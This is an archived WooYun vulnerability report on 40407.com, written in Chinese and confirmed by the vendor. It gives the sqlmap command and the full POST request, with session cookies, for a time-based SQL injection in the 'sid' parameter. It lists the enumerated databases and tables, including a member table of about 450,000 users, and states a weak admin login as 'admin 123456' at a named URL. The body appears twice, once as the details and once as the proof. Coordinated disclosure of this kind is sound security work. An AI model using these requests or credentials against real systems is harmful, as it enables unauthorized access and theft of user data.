当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0202879

漏洞标题:游戏安全之40407游戏网某处SQL注入(涉及50w用户信息)+某系统弱口令

相关厂商:40407.com

漏洞作者: 黑色键盘丶

提交时间:2016-04-28 09:09

修复时间:2016-06-12 11:00

公开时间:2016-06-12 11:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-28: 细节已通知厂商并且等待厂商处理中
2016-04-28: 厂商已经确认,细节仅向厂商公开
2016-05-08: 细节向核心白帽子及相关领域专家公开
2016-05-18: 细节向普通白帽子公开
2016-05-28: 细节向实习白帽子公开
2016-06-12: 细节向公众公开

简要描述:

RT

详细说明:

post注入语法:sqlmap.py -r 1.txt --dbs 注入参数sid
====================post数据包=======================
POST /index.php?c=pay&a=testgamerole HTTP/1.1
Host: wan.40407.com
Proxy-Connection: keep-alive
Content-Length: 36
Accept: */*
Origin: http://wan.40407.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://wan.40407.com/index.php?c=pay&pt=pt
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3D
username=heise123&gid=5&sid=32&isyk=


数据库信息

available databases [25]:
[*] `14x`
[*] `399wantg`
[*] `40407box_test`
[*] `40407box`
[*] `40407boxpt_test`
[*] `40407boxpt`
[*] `40407boxstat`
[*] `40407data`
[*] `40407kfz`
[*] `40407lol`
[*] `40407tqyt`
[*] `dkwdv{`
[*] `kp.ya58.cn`
[*] `s}\x1a!\x03!`
[*] `ucentir)\x11`
[*] `xiro7!`
[*] bcgua
[*] information_schema
[*] mysql
[*] percona
[*] performance_schema
[*] projeit
[*] smweb
[*] testcy
[*] tuan


当前库表信息

Database: 40407boxpt
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| box_game_tg_data | 761184 |
| box_game_member | 450339 |
| box_gamecard_sn | 280019 |
| box_pay | 22280 |
| box_score_record | 4632 |
| box_score_playinfo | 4016 |
| box_member_mac | 3041 |
| box_content_1 | 2220 |
| box_content_1_extend | 1900 |
| box_score_rule | 1306 |
| box_pk_username | 1074 |
| box_game_server | 650 |
| box_content_1_item | 576 |
| box_jf_pay | 479 |
| box_tag | 236 |
| box_admin_user | 227 |
| box_score_game | 160 |
| box_content_1_sjsg | 139 |
| box_score_pay | 139 |
| box_category | 131 |
| box_content_1_jjsg | 125 |
| box_content_1_sjtl | 90 |
| box_content_1_hero | 67 |
| box_content_1_zwx | 67 |
| box_content_1_nslm | 55 |
| box_model | 35 |
| box_model_field | 35 |
| box_game | 34 |
| box_content_1_rxsg2 | 32 |
| box_content_1_jyjh | 29 |
| box_content_1_ocean | 26 |
| box_content_1_hwsg | 25 |
| box_content_1_mycs | 25 |
| box_user_tg | 24 |
| box_pay_cycle | 23 |
| box_linkage | 18 |
| box_ad | 16 |
| box_content_1_jyjx | 16 |
| box_pk_game | 13 |
| box_pk_number | 13 |
| box_content | 12 |
| box_gid_modelid | 10 |
| box_pingtaibi_fanli | 10 |
| box_pk_rule | 10 |
| box_content_1_bztx | 8 |
| box_plugin | 6 |
| box_content_1_smzt | 5 |
| box_member_group | 5 |
| box_admin_group | 4 |
| box_content_1_jz | 4 |
| box_content_1_rxsg | 4 |
| box_role | 4 |
| box_content_1_mjll | 3 |
| box_wan_top_gg | 3 |
| box_content_1_dsg | 2 |
| box_content_1_game | 2 |
| box_content_1_swydn | 2 |
| box_content_1_xbjz | 2 |
+----------------------+---------+
-------------------------------------
Database: 40407boxpt 45w用户信息
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| box_game_member | 450339 |
+-----------------+---------+
20多万估计卡密信息吧 70多w什么信息的 支付信息等


由于是延迟注入这里就不跑数据信息证明了
======================================================================

http://tg.40407.com/admin/mainindex/index  admin 123456 进入


可以修改游戏的推广信息啦

123.png


一些用户信息

3.png


漏洞证明:

post注入语法:sqlmap.py -r 1.txt --dbs 注入参数sid
====================post数据包=======================
POST /index.php?c=pay&a=testgamerole HTTP/1.1
Host: wan.40407.com
Proxy-Connection: keep-alive
Content-Length: 36
Accept: */*
Origin: http://wan.40407.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://wan.40407.com/index.php?c=pay&pt=pt
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3D
username=heise123&gid=5&sid=32&isyk=


数据库信息

available databases [25]:
[*] `14x`
[*] `399wantg`
[*] `40407box_test`
[*] `40407box`
[*] `40407boxpt_test`
[*] `40407boxpt`
[*] `40407boxstat`
[*] `40407data`
[*] `40407kfz`
[*] `40407lol`
[*] `40407tqyt`
[*] `dkwdv{`
[*] `kp.ya58.cn`
[*] `s}\x1a!\x03!`
[*] `ucentir)\x11`
[*] `xiro7!`
[*] bcgua
[*] information_schema
[*] mysql
[*] percona
[*] performance_schema
[*] projeit
[*] smweb
[*] testcy
[*] tuan


当前库表信息

Database: 40407boxpt
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| box_game_tg_data | 761184 |
| box_game_member | 450339 |
| box_gamecard_sn | 280019 |
| box_pay | 22280 |
| box_score_record | 4632 |
| box_score_playinfo | 4016 |
| box_member_mac | 3041 |
| box_content_1 | 2220 |
| box_content_1_extend | 1900 |
| box_score_rule | 1306 |
| box_pk_username | 1074 |
| box_game_server | 650 |
| box_content_1_item | 576 |
| box_jf_pay | 479 |
| box_tag | 236 |
| box_admin_user | 227 |
| box_score_game | 160 |
| box_content_1_sjsg | 139 |
| box_score_pay | 139 |
| box_category | 131 |
| box_content_1_jjsg | 125 |
| box_content_1_sjtl | 90 |
| box_content_1_hero | 67 |
| box_content_1_zwx | 67 |
| box_content_1_nslm | 55 |
| box_model | 35 |
| box_model_field | 35 |
| box_game | 34 |
| box_content_1_rxsg2 | 32 |
| box_content_1_jyjh | 29 |
| box_content_1_ocean | 26 |
| box_content_1_hwsg | 25 |
| box_content_1_mycs | 25 |
| box_user_tg | 24 |
| box_pay_cycle | 23 |
| box_linkage | 18 |
| box_ad | 16 |
| box_content_1_jyjx | 16 |
| box_pk_game | 13 |
| box_pk_number | 13 |
| box_content | 12 |
| box_gid_modelid | 10 |
| box_pingtaibi_fanli | 10 |
| box_pk_rule | 10 |
| box_content_1_bztx | 8 |
| box_plugin | 6 |
| box_content_1_smzt | 5 |
| box_member_group | 5 |
| box_admin_group | 4 |
| box_content_1_jz | 4 |
| box_content_1_rxsg | 4 |
| box_role | 4 |
| box_content_1_mjll | 3 |
| box_wan_top_gg | 3 |
| box_content_1_dsg | 2 |
| box_content_1_game | 2 |
| box_content_1_swydn | 2 |
| box_content_1_xbjz | 2 |
+----------------------+---------+
-------------------------------------
Database: 40407boxpt 45w用户信息
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| box_game_member | 450339 |
+-----------------+---------+
20多万估计卡密信息吧 70多w什么信息的 支付信息等


由于是延迟注入这里就不跑数据信息证明了
======================================================================

http://tg.40407.com/admin/mainindex/index  admin 123456 进入


可以修改游戏的推广信息啦

123.png


一些用户信息

3.png


修复方案:

过滤 加强密码

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-28 10:54

厂商回复:

谢谢,参数过滤的还是要加强处理,平台没上线内部测试结果没修改密码……

最新状态:

暂无